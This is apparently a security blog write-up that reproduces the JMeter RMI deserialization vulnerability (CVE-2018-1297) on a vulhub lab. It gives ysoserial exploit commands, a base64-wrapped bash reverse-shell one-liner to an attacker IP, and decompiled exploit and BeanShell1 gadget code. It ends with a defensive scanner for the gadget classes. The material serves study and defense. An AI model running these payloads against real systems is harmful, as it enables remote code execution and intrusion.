Jmeter RMI Deserialization Command Execution Vulnerability Reproduction
2022-08-11 05:32:00 【Tauil】
Tool download
ysoserial
wget https://github.com/frohoff/ysoserial/releases/tag/v0.0.6/ysoserial-all.jar
Vulnerability reproduction
Target range: vulhub - jmeter/CVE-2018-1297/
Running sudo docker-compose config shows that, once the environment is up, it starts an RMI service listening on port 1099. ysoserial.exploit.RMIRegistryExploit is all that is needed to execute arbitrary commands against it:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit <target IP> <target port> BeanShell1 '<command to execute>'
Reverse shell connection:
Base64-encode this command: bash -i >& /dev/tcp/<attacker IP>/<any port> 0>&1
Then run: java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit <target IP> <target port> BeanShell1 'bash -c {echo,<base64 string>}|{base64,-d}|{bash,-i}'

Vulnerability analysis
https://www.anquanke.com/post/id/197829#h3-5
https://xz.aliyun.com/t/2223
Script analysis
The exploit opens a remote connection to the RMI Registry at the target host and port (RMI communicates over JRMP, the Java Remote Messaging Protocol) and, once the connection succeeds, submits the payload selected by the user for execution.
RMIRegistryExploit
package ysoserial.exploit;

import java.rmi.ConnectIOException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import ysoserial.payloads.CommonsCollections1;
import ysoserial.payloads.ObjectPayload;
import ysoserial.secmgr.ExecCheckingSecurityManager;

public class RMIRegistryExploit {
    public RMIRegistryExploit() {
    }

    // Arguments: host, port, payload name (e.g. BeanShell1), command
    public static void main(String[] args) throws Exception {
        String host = args[0];
        int port = Integer.parseInt(args[1]);
        String command = args[3];
        Registry registry = LocateRegistry.getRegistry(host, port);
        // The payload name is resolved inside the ysoserial.payloads package
        String className = CommonsCollections1.class.getPackage().getName() + "." + args[2];
        @SuppressWarnings("unchecked")
        Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
        try {
            // Plain JRMP first; list() doubles as a cheap reachability check
            registry.list();
        } catch (ConnectIOException e) {
            // Fall back to an SSL client socket factory (helper class not reproduced on this page)
            registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory());
        }
        exploit(registry, payloadClass, command);
    }

    public static void exploit(Registry registry, Class<? extends ObjectPayload> payloadClass, String command) throws Exception {
        // "1" is how the decompiled output names an anonymous inner class (a Callable)
        // that builds the payload and sends it to the registry; its body is not shown here
        (new ExecCheckingSecurityManager()).callWrapped(new 1(payloadClass, command, registry));
    }
}
BeanShell1
Turns the supplied command into the corresponding serialized content, which is then sent as the message.
package ysoserial.payloads;

import bsh.Interpreter;
import bsh.XThis;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Arrays;
import java.util.Comparator;
import java.util.PriorityQueue;
import ysoserial.Strings;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

@Dependencies({"org.beanshell:bsh:2.0b5"})
@Authors({"pwntester", "cschneider4711"})
public class BeanShell1 extends PayloadRunner implements ObjectPayload<PriorityQueue> {
    public BeanShell1() {
    }

    public PriorityQueue getObject(String command) throws Exception {
        // A BeanShell script whose compare() method runs the command; the command is
        // split on spaces and each piece is quoted as a ProcessBuilder argument
        String payload = "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{"
                + Strings.join(Arrays.asList(command.replaceAll("\\\\", "\\\\\\\\").replaceAll("\"", "\\\"").split(" ")), ",", "\"", "\"")
                + "}).start();return new Integer(1);}";
        Interpreter i = new Interpreter();
        i.eval(payload);
        // XThis exposes the interpreter namespace through a serializable InvocationHandler
        XThis xt = new XThis(i.getNameSpace(), i);
        InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);
        // A dynamic proxy implementing Comparator that forwards compare() to the script above
        Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(),
                new Class[]{Comparator.class}, handler);
        // PriorityQueue.readObject() re-heapifies its elements, which invokes the comparator;
        // two elements are planted via reflection so that a comparison actually takes place
        PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
        Object[] queue = new Object[]{1, 1};
        Reflections.setFieldValue(priorityQueue, "queue", queue);
        Reflections.setFieldValue(priorityQueue, "size", 2);
        return priorityQueue;
    }

    public static void main(String[] args) throws Exception {
        PayloadRunner.run(BeanShell1.class, args);
    }
}
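From the defender's side, an added example that is not code from the original post or from ysoserial: a scanner that walks a captured Java serialization stream for TC_CLASSDESC and TC_PROXYCLASSDESC records and flags the classes the BeanShell1 chain described above depends on (bsh.* plus a PriorityQueue whose Comparator arrives as a dynamic proxy). The byte stream it runs on is constructed by hand, with made-up serialVersionUID values, to mirror that chain; the detection rule assumes that no legitimate registry traffic carries BeanShell classes.

```python
import re
import struct

TC_CLASSDESC = 0x72        # followed by a modified-UTF class name
TC_PROXYCLASSDESC = 0x7D   # followed by an int count and that many interface names
_NAME = re.compile(rb"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")
# Indicators taken from the chain on this page (constructed rule, not a vendor signature)
SUSPICIOUS_PREFIXES = ("bsh.", "org.apache.commons.collections.")


def _read_utf(buf, pos):
    """Return (name, next_pos) if a plausible Java class name starts at pos, else None."""
    if pos + 2 > len(buf):
        return None
    (n,) = struct.unpack_from(">H", buf, pos)
    raw = buf[pos + 2:pos + 2 + n]
    if n == 0 or len(raw) != n or not _NAME.match(raw):
        return None
    return raw.decode("ascii"), pos + 2 + n


def extract_class_names(buf):
    """Tolerant scan: collects class names from class and proxy-class descriptors."""
    names, pos = [], 4  # skip STREAM_MAGIC + STREAM_VERSION
    while pos < len(buf):
        tc = buf[pos]
        if tc == TC_CLASSDESC:
            hit = _read_utf(buf, pos + 1)
            if hit:
                names.append(hit[0])
                pos = hit[1]
                continue
        elif tc == TC_PROXYCLASSDESC and pos + 5 <= len(buf):
            (count,) = struct.unpack_from(">I", buf, pos + 1)
            p, ifaces = pos + 5, []
            for _ in range(min(count, 64)):
                hit = _read_utf(buf, p)
                if not hit:
                    break
                ifaces.append(hit[0])
                p = hit[1]
            if ifaces:
                names.append("$Proxy[" + ",".join(ifaces) + "]")
                pos = p
                continue
        pos += 1
    return names


def flag_gadget_classes(buf):
    """Return (all class names seen, the subset that matches this page's gadget chain)."""
    names = extract_class_names(buf)
    flagged = [n for n in names if n.startswith(SUSPICIOUS_PREFIXES)]
    if "java.util.PriorityQueue" in names and any(n.startswith("$Proxy[") for n in names):
        flagged.append("java.util.PriorityQueue with proxied Comparator")
    return names, flagged


def _utf(s):
    return struct.pack(">H", len(s)) + s.encode("ascii")


# Constructed stream shaped like the BeanShell1 object graph (serialVersionUIDs are made up)
SAMPLE_STREAM = (
    b"\xac\xed\x00\x05" + b"\x73"                                  # magic, version, TC_OBJECT
    + b"\x72" + _utf("java.util.PriorityQueue")
    + b"\x94\xda\x30\xb4\xfb\x3f\x82\xb1" + b"\x03\x00\x00\x78\x70"  # suid, flags, 0 fields, end, null
    + b"\x7d\x00\x00\x00\x01" + _utf("java.util.Comparator") + b"\x78\x70"
    + b"\x73\x72" + _utf("bsh.XThis")
    + b"\xd0\x6d\x5f\x5b\x3e\x6a\xc0\x15" + b"\x03\x00\x00\x78\x70"
)
```

A registry proxy or a pcap carve can feed captured bind/lookup request bodies to flag_gadget_classes and alert on any non-empty flagged list.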